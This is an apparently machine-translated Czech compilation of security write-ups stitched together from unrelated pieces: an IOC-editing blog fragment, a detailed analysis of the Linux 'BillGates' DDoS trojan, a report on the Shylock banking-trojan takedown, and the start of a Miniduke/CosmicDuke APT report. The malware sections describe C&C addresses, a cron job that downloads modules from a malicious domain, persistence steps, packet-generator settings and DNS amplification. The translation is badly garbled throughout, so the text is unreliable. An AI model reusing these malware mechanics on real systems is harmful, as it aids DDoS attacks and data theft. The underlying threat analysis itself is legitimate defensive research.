Stavební IOCs s Mandiant IOCe je v mnoha ohledech přímočará pro jednoduchou logiku, budete muset pochopit, AND a OR nosné konstrukce pro vytváření složitějších logických větví. Přečtěte si uživatelskou příručku, která je nainstalována s editorem. Vzal jsem si jen několik atributů (MD5 , SHA1, velikost souboru), na začátku mého soubor MOV pro HackTool: Win32/Zeloxat.A, jak je vidět na obrázku 1.
IOCe
Obrázek 1
Budu vyplnění tohoto dalšího a sdílení úplnou sadu souborů MOV pro každý z těchto vzorků na žádost po páteční směny. Tweet mi pro ně @ holisticinfosec nebo napište mi přes Russ na holisticinfosec dot org.
Zítra budu běžet Jake soubor s výpisem pro svchost.exe přes Volatilita vidět, co můžeme dále učit a použít k vytvoření dalších IOCs. Zůstaňte naladěni.
Univerzální DDoS Trojan pro Linux 16.7.2014 Viry, Počítačový útok
V únoru 2014 článek byl publikován na populární ruské internetové stránky pod kuriózním názvem - Studium na BillGates Linux botnet . Je popsáno Trojan s dostatečně univerzální DDoS funkčnosti. Schopnost, že jsme našli nejzajímavější byla schopnost Trojana provádět DNS Amplification typu útoků. Kromě toho, že vycházelo z článku vyplývá, že Trojan měl propracovanou modulární strukturu, něco, co jsme dosud viděli ve světě Linuxu malware před.
Tento článek také odkaz pro stažení všech souborů Trojan (získaný přímo z infikovaného stroje) - což je to, co jsme udělali.
Archiv, který jsme stáhli obsahoval následující soubory, které se podle autora článku, byly všechny moduly stejného Trojan:
atddd; cupsdd; cupsddh; ksapdd; kysapdd; skysapdd; xfsdxd. Soubory cupsdd a cupsddh jsou detekovány produkty společnosti Kaspersky Lab jako Backdoor.Linux.Ganiw.a; atddd a zbývající soubory jsou detekovány jako Backdoor.Linux.Mayday.f.
Archiv se soubory také obsahoval konfigurační soubor pro cron - Plánovač úloh Linux. V tomto případě je nástroj se používá Trojan jako prostředek, jak se dostat oporu v systému. Trojan používá cron provádět následující úkoly:
Jednou za minutu - ukončení procesů všech aplikací, které mohou zasahovat do jeho provozu: iptables, nfsd4, profild.key, nfsd, DDosl, lengchao32, B26, codelove, node24. Přibližně jednou za devadesát minut - ukončit všechny své procesy: kysapd, atdd, skysapd, xfsdx, ksapd Přibližně jednou za dvě hodiny - stáhnout všechny jeho součásti do / etc adresáře z http://www.dgnfd564sdf.com:8080/ [název_modulu] (název_modulu = název modulu Trojana, např. cupsdd), po vymazání těchto souborů z / etc adresáře Poté, co v roce devadesát minut - obnovit všechny jeho moduly Každá minuta - purge systémové protokoly a bash historii příkazů a spouštění chmod 7777 [název_modulu] Při následné analýze souborů, nenašli jsme žádný kód odpovědné za ukládání konfigurační soubor pro cron. S největší pravděpodobností byl soubor ručně stáhnout na počítač oběti podle cybercriminal po získání vzdáleného přístupu k systému.
Backdoor.Linux.Mayday.f (atddd)
Soubor atddd je backdoor navržen tak, aby provádět různé typy DDoS útoků na servery zadané. Jak bylo uvedeno výše, výrobky Kaspersky Lab detekovat jako Backdoor.Linux.Mayday.f. Soubory kysapdd, skysapdd, xfsdxd, ksapdd jsou téměř přesné kopie atddd - s jedinou výjimkou, která je popsána dále v textu.
Backdoor začíná svůj provoz voláním funkce démona (1, 0), nadále běží na pozadí a přesměrování standardního vstupu, výstupu a chyby na / dev / null
Dále atddd shromažďuje příslušné informace o systému, včetně:
verze systému (zavoláním uname ()) počet procesorových jader a jejich hodinové sazby (převzato z / proc / cpuinfo) Zatížení CPU (převzato z / proc / stat) Zatížení sítě (data pro rozhraní s "eth" předpona převzaty z / proc / net / dev) Výše uvedené informace jsou uloženy v uvedené struktuře g_statBase.
Poté, backdoor dešifruje řetězec určující adresu IP C & C serveru a číslo portu. Šifrovací algoritmus použitý, je velmi jednoduchý: šifrovaný řetězec je přijata znak po znaku, s 1 přidána do ASCII kódu znaku, pokud jeho číslo je liché a odečte se od něj, pokud číslo postavy je dokonce. V důsledku toho, řetězec "3/3-2/4-269-85" se získají IP-адрес "202.103.178.76", zatímco "2/82" znamená číslo portu "10991".
Po tomto, atddd čte konfigurační soubor fwke.cfg, který je umístěn ve stejné složce se škodlivého programu. Informace z konfiguračního souboru je uložen ve struktuře g_fakeCfg. Pokud soubor neexistuje, je backdoor pokusy vytvořit a uložit následující údaje v něm:
1. řádek: 0 / / příznak, je-li 1 pak začne útok, je-li 0, pak ukončit útok
2. řádek: 127.0.0.1:127.0.0.1 / / rozsah odchozích IP adres
3. řádek: 10000:60000 / / odchozí rozsah portů pro útok
4. řádek: prázdný řádek název / / domény v případě DNS povodně (viz níže)
Tato informace je následně odeslán na server C & C a mohou být aktualizovány pomocí příkazu z C & C.
Dále, backdoor vytvoří nové vlákno, CThreadTaskManager :: ProcessMain (), ve kterém příkazy k zahájení útoku a ukončit útok se dal do provádění fronty. Poté, nový podproces je vytvořen - CThreadHostStatus :: ProcessMain (). V tomto vlákně, údaje o procesoru a zatížení sítě se aktualizuje každou sekundu a může být následně odeslán na server C & C pokud o to požádá.
Po tomto, 20 vlákna jsou vytvořeny, který číst informace z fronty úloh a, v závislosti na informacích číst, zahájí útok nebo ukončit to. Nicméně, některé závity nesmí být použit v útoku, pokud příslušná C & C příkaz má parametr (počet vláken, které mají být použity).
Pak malware vstoupí do nekonečné smyčky zpracování zpráv z C & C. Po navázání spojení s C & C, informace o verzi systému a CPU taktovací frekvence, stejně jako údaje ze struktury g_fakeCfg, je poslán do C & C každých 30 sekund.
V odezvě, server měl poslat 4 byty, z nichž první je pořadové číslo příkazu - od 1 do 4.
Dále, pokud má příkaz parametry, C & C pošle další čtyři bajty definující množství dat, která bude odeslána (tj. parametry). Pak parametry sami jsou odeslány; Jejich velikost by měla odpovídat počtu z předchozího C & C reakci.
O každém příkazu ve větším detailu:
0x01. Příkaz k útoku. Parametry definují typ útoku a počet vláken, který bude použit. Typ útoku je definován byte, který může nabývat hodnot od 0x80 až 0x84. To znamená, že 5 typů útoku jsou možné: 0x80 - TCP povodeň. Počet cílový port je odeslán do C & C ve své odpovědi jako parametr. Rozsah Zdrojový port je definován v fwke.cfg. Každý nový požadavek je odeslán z nového přístavu v rozsahu stanoveném v pořadí čísel portů. Cílová IP adresa je také definována v parametrech. 0x81 - UDP povodní. Stejně jako 0x80, ale UDP se používá jako protokol transportní vrstvy. 0x82 - ICMP povodeň. Stejně jako výše, ale přes ICMP. 0x83, 0x84 - dva DNS povodňové útoky. Jediný rozdíl je název domény poslal v žádosti o DNS. V prvním případě, název je generován náhodně, v druhém, je definován v parametru (čtvrtý řádek fwke.cfg). V podstatě, oba útoky jsou podobné 0x81, kromě toho, že portu 53 (standardní port pro službu DNS) se používá jako cílový port. 0x02. Příkaz k ukončení útoku. Hodnota v prvním řádku fwke.cfg se změní na 0 a útok je ukončen. 0x03. Příkaz aktualizovat soubor fwke.cfg. Reakce také strukturu podobnou g_fakeCfg, údaje, ze kterých se používá k vytvoření nového souboru fwke.cfg. 0x04. Příkaz k odeslání stavu aktuálního příkazu v provedení na serveru C & C. Kromě výše uvedeného, backdoor obsahuje několik prázdných metody (bez jakéhokoliv kódu), které mají podivné názvy: CThreadAttack :: EmptyConnectionAtk, CThreadAttack :: FakeUserAtk, CThreadAttack :: HttpAtk. Zdá se, že malware spisovatel měl v plánu rozšířit funkčnost škodlivého programu, a to je testovací verze, spíše než finální verze. Soubor cupsdd, které je uvedeno níže, poskytuje potvrzení tohoto.
Soubory kysapdd, skysapdd, xfsdxd, ksapdd jsou téměř identické kopie atddd, s výjimkou, že obsahují různé adresy serveru C & C: 112.90.252.76:10991, 112.90.22.197:10991, 116.10.189.246:10991 a 121.12.110.96:10991 , v tomto pořadí. Jména jejich konfigurační soubory jsou také odlišné: fsfe.cfg, btgw.cfg, fake.cfg, xcke.cfg, resp.
To znamená, že v rozporu s naším očekáváním, že soubory atddd, kysapdd, skysapdd, xfsdxd, ksapdd nejsou moduly jednoho kusu malware, ale spíše různých kopií stejného Trojan, každý spojující jeho vlastní C & C serveru. Nicméně, toto není nejvíce zvláštní část zdaleka.
Backdoor.Linux.Ganiw.a (cupsdd)
Stejně jako soubory popsaných výše, tento soubor je backdoor navržen tak, aby vykonávat různé typy útoků DDoS. Nicméně, cupsdd je podstatně více funkcí a sofistikovanější, než jeho "kolegové", i když v místech jeho kód je velmi podobný tomu nalezený v atddd.
Backdoor začíná svůj provoz o inicializaci proměnných, které potřebuje z řetězce "116.10.189.246:30000:1:1: h: 578856:579372:579888" (oddělovač - ":"), který je nejprve dešifruje pomocí algoritmu RSA. Řetězec obsahuje následující proměnné:
IP adresa C & C serveru - g_strConnTgt = 116.10.189.246
g_iGatsPort = 30000 - Port C & C serveru
g_iGatsIsFx = 1 a g_iIsService = 1 - vlajky použity později
g_strBillTail = h - postfix pro název souboru, který bude klesl (viz níže)
g_strCryptStart = 578.856, g_strDStart = 579.372, g_strNStart = 579888 - odkazy na údaje RSA (šifrovaný řetězec a klíčové)
Dále, malware kapky a spustí soubor, který je umístěn na posunu 0xb1728 od začátku původního souboru, a je 335872 bajtů ve velikosti, za předpokladu, že soubor není již spuštěna. Malware zkontroluje, zda soubor běží a snaží svázat socket 127.0.0.1:10808. Je-li pokus úspěšný, znamená to, že soubor není spuštěn, a je třeba ji upustil a popraven.
Pokud soubor je již spuštěna, její proces, jehož PID lze nalézt v souboru / tmp / bill.lock, je ukončen (kill (pid, 9)). Pak je soubor klesla stejně, nahradí stávající kopie.
Název souboru, který je zrušen je generován z názvu aktuálního souboru, který je spuštěn + postfix z proměnné g_strBillTail. V našem případě soubor byl jmenován cupsddh a byl umístěn ve stejné složce s kapátkem.
Po tomto, současný proces vidličky a dítě proces volá funkci systému ("/ cesta / k / cupsddh"), který vykonává soubor klesl.
Dále, funkce démon (1, 0) se nazývá, pro stejné účely jako v případě vzorku popsaného výše (atddd).
Poté, malware zvládá situaci, pokud by byla cupsdd dříve provedena a je v současné době aktivní. Za tímto účelem se zkontroluje, zda soubor / tmp / gates.lock existuje. Pokud to neexistuje, aktuální proces je ukončen (exit (0)). Pokud ne, soubor (/ tmp / gates.lock) je vytvořen a PID současného procesu je zapsán do něj.
Pak, když vlajka g_iIsService == 1, Backdoor si klade ke spuštění při spuštění systému tím, že vytvoří následující skript s názvem DbSecuritySpt v / etc / init.d /:
#! / Bin / bash / cesta / k / cupsdd
Malware také vytváří symbolické odkazy na skript v / etc / rc [1-5] .1/S97DbSecuritySpt
Dále, malware přečte konfigurační soubor conf.n (pokud existuje), ze stejné složce jako ten, ve kterém se nachází cupsdd. První 4 bajty souboru definovat velikost dat, která následuje. Všechna data jsou uložena ve struktuře g_cnfgDoing.
Pak malware přečte soubor obsahující příkazy - cmd.n. Formát je stejný jako v conf.n. Data jsou uložena ve struktuře g_cmdDoing.
Poté, malware získá všechny potřebné informace o systému, včetně:
Název operačního systému a verze jádra (např. Linux 3.11.0-15-generic), voláním uname () CPU taktovací frekvence, vzít z / proc / cpuinfo Počet jader CPU, odebraných z / proc / cpuinfo a zatížení CPU, převzaté z / proc / stat Zatížení sítě, převzato z / proc / net / dev Pevný disk velikosti v MB, převzato z / proc / meminfo Informace o síťových rozhraních, odebraných z / proc / net / dev Všechna data jsou uložena ve struktuře g_statBase.
Dále, nový proud, CThreadTaskGates :: ProcessMain, je vytvořen, ve kterém jsou tyto příkazy zpracované:
0x03. DoConfigCommand (). Aktualizujte konfigurační soubor conf.n. 0x05. DoUpdateCommand (). Začít nové vlákno, CThreadUpdate :: ProcessMain, ve kterém aktualizace jednou z jeho součástí. Příkaz přijímá číslo od 1 do 3, jako parametr. Každá z těchto čísel je spojena s jedním z následujících řetězců: 1 - "Alib" - soubor / usr / lib / libamplify.so 2 - "Bill" - klesl modul (cupsddh) 3 - "Gates" - kapátko (cupsdd)
V závislosti na parametru, jedna z komponent škodlivý program je aktualizován. Aktualizace se spustí vysláním 6 bajtů, které obsahují řetězec "EF76 # ^" k serveru C & C, následuje jeden z řetězců, uvedených výše (v závislosti na parametru).
C & C reaguje tím, že pošle 4 bajty obsahují délku (v bajtech) souboru, který bude převedena další. Pak C & C přenáší samotný soubor v 1024 bajtů paketů.
Za prvé, soubor je uložen v adresáři / tmp pod náhodným jménem se skládá z číslic. Pak, v závislosti na souboru, který byl přijat, existující soubor cupsdd (nebo cupsddh) nahrazuje nebo soubor se zkopíruje do / usr / lib / libamplify.so
Dále, dočasný soubor bude odstraněn z / tmp, a příkaz chmod slouží k nastavení 755 oprávnění k výslednému souboru. Poté se v případě, že aktualizace cupsddh, aktivní proces je ukončen a nový soubor je vypuštěn. V případě aktualizace cupsdd, závěrečná etapa (od kopírování souboru z / tmp) se provádí cupsddh, ke kterému je příslušný příkaz odeslán.
0x07. DoCommandCommand (). Napište nový příkaz cmd.n. 0x02. StopUpdate (). Zavřít aktuální spojení, která byla založena za účelem aktualizace modulů. Dále, backdoor spustí několik vláken, ve kterých se současně provádí několik dalších operací:
CThreadClientStatus aktualizuje údaje o procesoru a zatížení sítě ve struktuře g_statBase každou sekundu. CThreadRecycle odstraňuje dokončené úkoly z fronty. CThreadConnSender čte příkazy z fronty a předává je do cupsddh modulu přes TCP spojení s 127.0.0.1 na portu 10808. V reakci obdrží stav jejich provedení. CThreadMonBill kontroluje, zda modul cupsddh běží jednou za minutu. Pokud ne, spadne a spustí jej znovu. CThreadLoopCmd čte příkazy z g_cmdDoing (soubor cmd.n) a provádí jejich pomocí systémového volání (cmd). Dále, hlavní vlákno vstoupí do smyčky příjem a zpracování příkazů ze serveru C & C. Existují dvě možnosti, v tomto případě, v závislosti na g_iGatsIsFx vlajky:
Pokud je nastaven příznak (== 1), malware jednoduše používá nové vlákno poslat informace o systému a aktuální konfiguraci z g_cnfgDoing na C & C a čeká na příjem příkazů v reakci, jako vzorku (atddd) je popsáno výše; Pokud není nastaven příznak, pak komunikační relaci je iniciována C & C. Jinými slovy, malware čeká na C & C se připojit a začne přenášet data vyšší pouze tehdy, pokud bylo spojení navázáno uvedené.
Příkazy přijaté od C & C jsou rozděleny do dvou frontách: buď pro provedení v současném modulu (v závitu CThreadTaskGates popsaných výše), nebo pro předání do cupsddh modulu (závit CThreadConnSender).
Backdoor.Linux.Ganiw.a (cupsddh)
Soubor je nabitý UPX. Poté, co byl rozbalen, volá daemon (1,0). To vytvoří soubor / tmp / bill.lock, v němž ukládá PID aktuálního procesu. cupsddh ukládá systémová data ve struktuře g_statBase, který je totožný s tím, že používá cupsdd.
Dále vyplní se struktura g_provinceDns s IP adresy serverů DNS převede na binární data v síťovém pořadí bajtů pomocí funkce inet_addr (), přičemž data z pole řetězců g_sProvinceDns (offset v rozbaleného souboru: 0x8f44с, velikost 4608 bajtů).
cupsddh spustí příkaz "insmod / usr / lib / xpacket.ko" při pokusu o načtení modulu jádra do jádra. Nicméně, soubor není přítomen na "čistých" systémů a malware nedává žádný pokus, aby si jej stáhnout nebo získat ji jiným způsobem.
Další data ze souboru / usr / libamplify.so (jak se ukázalo, není knihovna, ale ještě jeden konfigurační soubor) je načten do struktury g_AmpResource. Soubor má následující formát: 1. dword je počet DWORD, které následují. Zdá se, že obsahuje seznam IP adres DNS serverů, které jsou v současné době relevantní, tj. těch, vhodné pro typ DNS Amplification DDoS útoky.
Poté, modul vytvoří dvě vlákna: CThreadTask a CThreadRecycle. Bývalý vykonává příkazy z fronty, obsahující příkazy, které přišly z cupsdd modulu. Ten odstraní příkazy, které byly provedeny. Dále, hlavní vlákno váže socket 127.0.0.1:10808 a vstoupí do nekonečné smyčky, přijímá příkazy od cupsdd modulu a uvedení příkazy přijaté do výše fronty.
Následující příkazy jsou možné:
0x01. Začátek útoku podle parametrů obdrželi. Podívejte se na podrobnější popis níže. 0x02. Ukončit aktuální útok, nastavením příslušného příznaku. 0x03. Aktualizace aktuální konfiguraci ve struktuře g_cnfgDoing, který se používá při útoku. Také, aktualizovat stávající místní MAC adresy, stejně jako MAC adresu a IP aktuálního brány ve struktuře g_statBase. 0x05. Závěrečná fáze aktualizace cupsdd modul (viz výše).
Jsou dva hlavní způsoby útoku možná: normální režim a režim jádra.
Režim jádra
Tento režim používá pktgen , paketový generátor kernel-level zabudovaný do Linuxu. Jeho výhodou je to, že útočník provoz je vytvořen s největší možnou rychlostí pro danou síťového rozhraní. Kromě toho, že pakety vytvořené tímto způsobem, není možné detekovat běžnými sniffers jako např. standardní tcpdump, protože pakety jsou generovány na úrovni jádra.
Generátor paketů je řízen pomocí sady scripts / konfigurační soubory v adresáři / proc / net / pktgen, ale modul pktgen musí být nejprve vloženy do jádra vyvoláním příkazu "modprobe pktgen". Nicméně, jsem nenašel žádné takové hovory. Zdá se, že volání "insmod / usr / lib / xpacket.ko" je používán místo toho, ačkoli, jak již bylo uvedeno výše, soubor chybí ze systému ve výchozím nastavení. Výsledkem je, že v režimu jádra není funkční v této verzi malware.
Nicméně, malware pokusí zapsat několik souborů do / proc / net / pktgen složky, a to:
. souboru / proc / net / pktgen / kpktgend_% d pro každé jádro procesoru, kde% d je jádro číslo, počínaje 0 Obsah souboru je následující: rem_device_all add_device eth% d max_before_softirq 10000
. souboru / proc / net / pktgen / eth% d pro každé jádro procesoru, kde% d je jádro číslo, počínaje 0 Obsah souboru je následující: Počet 0 clone_skb 0 Zpoždění 0 TXSIZE_RND min_pkt_size% d max_pkt_size% d IPSRC_RND src_min% s src_max% s UDPSRC_RND udp_src_min% d udp_src_max% d dst% s udp_dst_min% d udp_dst_max% d dst_mac% 02x% 02x% 02x% 02x% 02x% 02x / / MAC adresa brány z g_statBase is_multi% d multi_dst% s / / pokud existuje několik adres, které mají být použity v útoku (tj. v případě, že hodnota v předchozím řádku není rovno 0), ale jsou uvedeny v těchto řádků, jejichž počet odpovídá předchozí parametr pkt_type% d dns_domain% s syn_flag% d is_dns_random% d dns_type% d is_edns% d edns_len% d is_edns_sec% d
Hodnoty většiny pktgen parametry jsou předávány z cupsdd pomocí příkazových parametrů.
soubor / proc / net / pktgen / pgctrl, který obsahuje řetězec "start". Normální útok
Stejně jako v případě atddd, normální režim útok používá raw sokety.
Následující typy útoku je možné v tomto režimu:
CAttackSyn - TCP-SYN flood. CAttackUdp - UDP oken (jako je tomu v případě atddd) CAttackDns - DNS oken (jako je tomu v případě atddd) CAttackIcmp - ICMP oken (jako je tomu v případě atddd) CAttackCc - HTTP povodní. CAttackAmp - DNS Amplification. Posledním typem útoku na výše uvedeném seznamu je odlišná v tom pakety jsou odesílány do zranitelných DNS servery, s cílem útoku zadanou IP adresou odesílatele. V důsledku toho, cybercriminal odešle malý paket s požadavkem na DNS a DNS server reaguje na cíl útoku s výrazně větší paketu. Seznam ohrožených DNS serveru je uložen v souboru libamplify.so, který je zapsán na disk po příslušném příkazem z C & C.
Post Scriptum. BillGates v1.5
Tato verze Trojan se objevil o něco později a je zřejmě v současné době nejnovější. V podstatě se jedná o stejný cupsdd, jen trochu "ve tvaru nahoru". Celkově lze říci, že je logika v kódu, a existuje několik nových funkcí.
Nejvýznamnější změny byly provedeny v modulu Gates, tj. soubor cupsdd. Nyní má tři provozní režimy. Volba režimu je založena na složku, ze které soubor je zahájena. Konkrétně, pokud je spuštěn z adresáře / usr / bin / pojie, režim pak sledování je povoleno, jinak modul pracuje v režimu instalace a aktualizace, které je později nahrazen režimu, ve kterém kontroluje Bill modul.
Instalace a způsob aktualizace. Za prvé, modul ukončí svůj pracovní proces v režimu monitorování, pokud existuje. Jeho PID je uložen v souboru / tmp / moni.lock. Dále je přeinstaluje a znovu spustí Bill modulu. Dále, pokud proces pracuje v "ovládající Bill modul" režim existuje, že proces je ukončen. Jeho PID je uložen v souboru / tmp / gates.lock. Pokud je nastaven příznak g_iIsService (je definována stejným způsobem jako v předchozí verzi), modul nastaví sám spouštět při startu systému stejným způsobem jako před (v předchozí verzi). Dále modul zapíše svou cestu k souboru / tmp / notify.file a pak zkopíruje do souboru / usr / bin / pojie. Poté se spustí jeho kopii, což je, samozřejmě, nastaven na spuštění v režimu monitorování, a pak změní svůj provozní režim pro ovládání modulu Bill.
Režim sledování. Zapíše PID aktuálního procesu do souboru / tmp / moni.lock. Dále, to začne dvě vlákna - jedno sledovat Bill modul a druhý sledovat modulu Gates pracující v řízení režimu Bill. Pokud jeden z těchto procesů je v současné době neběží, příslušný soubor je vytvořen a znovu zahájena.
Ovládání režimu modulu Bill. Činnost modulu Gates jsou přesně stejné, jako tomu bylo v předchozí verzi Trojan (po instalaci modulu Bill a inicializaci příslušné proměnné a struktury Trojan).
Abychom to shrnuli, v nové verzi Trojan jeho autoři přidali trochu "robustnost", aniž by se žádné významné změny funkčnosti.
Je také třeba poznamenat, že pevně IP adresa serveru C & C zůstala stejná (116.10.189.246) v této verzi, ale číslo portu změnilo - to je nyní 36008 místo 30000 v předchozí verzi.
Nedávno Kaspersky Lab přispěl k alianci činnými v trestním řízení a průmyslovými organizacemi, aby provedla opatření proti internetových domén a serverů, které tvoří jádro moderní cybercriminal infrastruktury, která používá Shylock Trojan napadnout on-line bankovních systémů po celém světě.
Shylock je bankovnictví Trojan, který byl poprvé objeven v roce 2011. Využívá man-in-the-browser útoky, jejichž cílem je ukrást bankovní přihlašovací údaje z počítačů klientů z předem daného seznamu cílových organizací. Většina z těchto organizací jsou banky, které se nacházejí v různých zemích.
Produkty Kaspersky Lab detekuje Shylock malware jako Backdoor.Win32.Caphaw a Trojan-Spy.Win32.Shylock.
Zjistili jsme, tento malware obecně od konce srpna 2011, jako Backdoor.Win32.Bifrose.fly. Specifická detekce tohoto samostatného rodu byl přidán v únoru 2012 Od té doby jsme pozorovali velmi málo detekce -. Asi 24,000 pokusy infikovat počítače chráněné produkty společnosti Kaspersky Lab na celém světě.
Jedná se o velmi skromné čísla, a to zejména ve srovnání s jinými neslavný bankovní malware, jako je Zeus, SpyEye, Carberp které byly vytvořené (a, v případě některých z nich, jako je Zeus, stále generovat), desítky či stovky tisíc detekce. Samozřejmě, že tato čísla nejsou nám říct všechno o tom, jak rozšířený a efektivní Shylock je, protože Kaspersky Lab "vidí" pouze část z celkového počtu uživatelů PC - pouze ti, kteří používají naše výrobky.
Nízká popularita neznamená, že Shylock méně nebezpečné ačkoli. Sada škodlivých technik využívá není o nic méně nebezpečné, než ten, který používá jiné podobné malware. Je schopen aplikovat své tělo v několika běžících procesů, má nástroje, aby se zabránilo detekci anti-malware software, používá několik pluginů, které přidávají další škodlivé funkce, jejichž cílem je obejít anti-malware software, sbírá hesla pro FTP servery, se šíří sám prostřednictvím poslů a servery, umožňuje vzdálený přístup k infikovaným strojem, video chytil a samozřejmě webové injekce.
Tato poslední funkce se používá k ukrást přihlašovací údaje pro online bankovnictví tím, že napíchne falešné zadávání dat pole do webové stránky vloženého v prohlížeči oběti.
Po celou dobu, co jsme viděli dva poměrně velké vrcholy v objasněnosti tohoto malware.
První z nich byla v listopadu 2012 a druhý byl v prosinci 2013.
Geografie 11. 2012 vrcholu byl následující:
Spojené království Itálie Polsko Ruská federace Mexiko Thajsko Írán Turecko Indie Španělsko Výše uvedená tabulka ukazuje top 10 zemí wheremost byly registrovány útoky pomocí Shylock malware. O něco více než rok později, v prosinci 2013 obrázek se dramaticky změnila.
Brazílie Ruská federace Vietnam Itálie Ukrajina Indie Spojené království Bělorusko Turecko Tchaj-wan Jak tyto tabulky ukazují, že zločinci za tímto malware definitivně přestala platit tolik pozornosti vyspělých e-peněžních trzích ve Velké Británii, Itálii a Polsku ve prospěch aktivně rozvíjejících se trzích Brazílie, Ruska a Vietnamu. Je to slso zajímavé, že oba vrcholy se stalo v pozdním podzimu do začátku zimního období, tradiční vysoké maloobchodní sezóně v mnoha zemích po celém světě.
Podle údajů Europolu, tento malware je infikováno více než 30.000 počítačů po celém světě. To je dost velký rozsah způsobit obrovské finanční škody, takže narušení páteřní infrastruktury Shylock je velmi dobrá zpráva.
A ještě lepší zprávou je, že poslední operace, koordinuje národní kriminality agentury ve Velké Británii (NOK), dohromady partnery z oblasti vymáhání práva a soukromého sektoru, včetně - mimo Kaspersky Lab - Europol, FBI, BAE Systems Applied Intelligence, Dell SecureWorks a ve Velké Británii GCHQ (Government Communications Headquarters), aby společně bojovat proti hrozbě. My v Kaspersky Lab byli rádi, přidat náš skromný příspěvek k této činnosti. Globální akce přináší pozitivní výsledky - příkladem je operace zaměřená na Shylock malware.
Miniduke je zpět: Nemesis Gemina a Botgen Studio 15.7.2014 Viry
2014 aktualizace na jednom ze světově nejvíce neobvyklých APT operací
V roce 2013, spolu s naší partnerskou CrySyS Lab, jsme oznámili náš výzkum na nové APT herec se přezdívá "Miniduke". Stál se z "APT parta" z několika důvodů, včetně:
Jeho použití přizpůsobeného backdoor napsán v assembleru (kteří stále píše v assembleru ve věku Java a. NET?) Unikátní velení a kontrolní mechanismus, který používá více redundance cest, včetně Twitter účty Kradmý přenos aktualizací jako spustitelné skryté uvnitř soubory ve formátu GIF (formou steganografie) Ukázali jsme, že tento herec hrozba použít malware vyvinuta s použitím "old-school" virus psaní techniky a návyky.
Naše analýza se pokračovalo později vědci z kruhy / Lucembursko a několika dalšími AV společností. V poslední době jsme si uvědomili z F-Secure publikace na stejné téma (pod názvem "CosmicDuke").
V důsledku našich publikací od roku 2013, kampaně Miniduke se zastavil nebo alespoň v intenzitě snížil. Nicméně, na začátku roku 2014 se obnovil útoky v plné síle, opět chytil naši pozornost.
Věříme, že je čas odhalit více informací o jejich činnosti.
"Staré" Miniduke v roce 2014
Starém stylu Miniduke implantáty od roku 2013 jsou stále kolem sebe a jsou používány v současných kampaních.
Stále se spoléhá na Twitter účtů, které obsahují hardcoded C & C URL ukazující na velení a řízení serveru. Jeden takový účet byl následující, pozorované v únoru 2014
I když formát C a C URL byl změněn z předchozích variant, kódování algoritmus je stejný. Linka výše, mohou být dekódovány do plného C & C: URL:
hxxp :/ / algherolido.it / img / common / thumb / thumb.php
Tento dekódovaný URL byla aktivní C & C, z nichž byly shromážděny několik aktualizace:
Aktualizace 1:
MD5 93382e0b2db1a1283dbed5d9866c7bf2 Velikost 705536 bajtů Sestavení So 14.prosince 18:44:11 2013 To Trojan je velký balík, v důsledku použití vlastní balírny. Svazek má zvláštní ladění řetězec uvnitř:
MD5 b80232f25dbceb6953994e45fb7ff749 Velikost 27648 bajtů Kompilace timestamp Středa 5.března 2014 09:44:36 C & C hxxp :/ / rtproductionsusa.com / wp-includes / images / smajlíci / icon_gif.php Další úprava, která byla pozorována na serveru C & C je:
Aktualizace 2:
MD5 7fcf05f7773dc3714ebad1a9b28ea8b9 Velikost 28160 bajtů Kompilace timestamp Pá 7.března 2014 10:04:58 C & C hxxp :/ / tangentialreality.com / cache / template / yoo_cache.php Pozorovali jsme jiný podobný Trojan, i když ne v C & Cs přímo:
MD5 edf7a81dab0bf0520bfb8204a010b730, ba57f95eba99722ebdeae433fc168d72 (klesl) Velikost 700K, 28160 (klesl) Kompilace časová razítka So 14.prosince 18:44:11 2013 (nahoře) Pá 10.ledna 12:59:36 2014 (klesl) C & C hxxp :/ / store.extremesportsevents.net / index.php? i = 62B ... [stříhat] Použití balírny Nemesis Gemina v užitečném zatížení Miniduke z nás hledat další vzorky v naší kolekci. To nás vedlo k několika novým poznatkům.
"Nový" Miniduke Malware ("CosmicDuke")
Po expozici 2013, herec za Miniduke Zdá se, že přešel na použití další uživatelský backdoor, který je schopen krást různé typy informací.
Malware spoofs populárních aplikací, jejichž cílem je běžet na pozadí, včetně informací o souboru, ikony a dokonce i velikost souboru:
Hlavní "nový" Miniduke backdoor (aka TinyBaron nebo CosmicDuke) je sestaven s použitím přizpůsobitelné rámec s názvem "BotGenStudio", který má flexibilitu k aktivaci / deaktivaci komponenty, když je bot postaven.
Komponenty mohou být rozděleny do 3 skupin
Vytrvalost Průzkum Exfiltrace Vytrvalost
Miniduke / CosmicDuke je schopno startovat přes Plánovač úloh systému Windows, přes individuální servisní binární, že založí nový proces nastavit ve speciálním klíči registru, nebo se spustí, když uživatel je pryč a Spořič se aktivuje.
Průzkum
Malware může ukrást celou řadu informací, včetně souborů na základě přípony názvu souboru a klíčová slova:
Poznámka: jsme přesvědčeni, že "* Sifr *" a "* SIFER *" klíčová slova nad odkazovat na přepis anglického slova "Cypher" v některých jazycích.
Také backdoor má mnoho dalších funkcí, včetně:
Keylogger Skype heslo zloděj Obecné informace o síti kombajn Screen Grabber (drapáky snímky každých 5 minut) Schránka grabber (drapáky obsah schránky každých 30 sekund) Microsoft Outlook, Windows Address Book zloděj Google Chrome heslo zloděj Google Talk heslo zloděj Heslo Opera zloděj TheBat! heslo zloděj Firefox, Thunderbird heslo zloděj Pohony / místo / locale / nainstalován software kombajn WiFi síť / adaptér informace kombajn LSA tajemství kombajn Chráněné úložiště tajemství kombajn Certifikát / soukromých klíčů vývozce URL Historie kombajn InteliForms tajemství kombajn IE Autocomplete, Outlook Express tajemství kombajn a další ... Exfiltrace
Malware implementuje několik metod exfiltrate informace, včetně nahrávání dat přes FTP a tři varianty HTTP založené na komunikačních mechanismů. Počet různých konektorů HTTP působí jako pomocníci, se snaží různými způsoby v případě, že jeden z nich je omezena místními bezpečnostními politikami a bezpečnostní software. Tyto tři metody jsou:
Přímé připojení TCP a HTTP relace přes Winsock knihovny HTTP relace přes Urlmon.dll HTTP relace pomocí neviditelné instance aplikace Internet Explorer jako objekt OLE Realizace Specifika
